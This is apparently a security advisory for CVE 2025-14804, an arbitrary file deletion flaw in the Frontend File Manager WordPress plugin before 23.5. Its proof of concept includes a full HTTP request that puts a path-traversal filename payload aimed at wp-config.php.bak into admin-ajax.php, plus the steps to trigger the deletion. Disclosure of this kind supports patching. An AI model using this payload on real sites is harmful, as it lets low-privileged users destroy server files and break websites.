Frontend File Manager < 23.5 – Subscriber+ Arbitrary File Deletion | CVE 2025-14804

Description

The plugin did not validate a path parameter and ownership of the file, allowing any authenticated users, such as subscribers to delete arbitrary files on the server

Proof of Concept

In the WordPress admin panel, create a new page and add the shortcode `[ffmwp]` to the content. This creates a file-upload page that is accessible to any logged-in user, including those with the Subscriber role (see the first screenshot).

Next, create a user with the Subscriber role and navigate to the page you previously created (e.g., https://<URL>/ffmwp/). This will display the upload form.

From this page, upload any .png file and click `Select Files`. In Burp Suite, forward the initial request and modify the filename parameter in the second request. Here, insert a path-traversal payload. In this example, we will demonstrate how an attacker could delete the wp-config.php file via the path traversal vulnerability:

```bash
# Create backup of wp-config.php
cp wp-config.php wp-config.php.bak
```

Modify the filename in the second request:

```
POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: <cookies>
Content-Length: 1940
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not_A Brand";v="99", "Chromium";v="142"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://example.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://example.com/ffmwp/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

wpfm_save_nonce=3cc68b4bc4&_wp_http_referer=%2Fffmwp%2F&action=wpfm_save_file_data&wpfm_bp_group_id=0&shortcode_groups=0&shortcode_groups=0&exist_file_id=&uploaded_files%5Btestpng-1763396556462%5D%5Bfilename%5D=../../../../wp-config.php.bak&--[SNIPPED]--
```

After the upload completes, the newly uploaded file will appear in the interface. Click the middle button (the trash icon) to trigger deletion. This will cause the server to delete the `wp-config.php.bak` file via the injected path-traversal payload (see the final screenshot).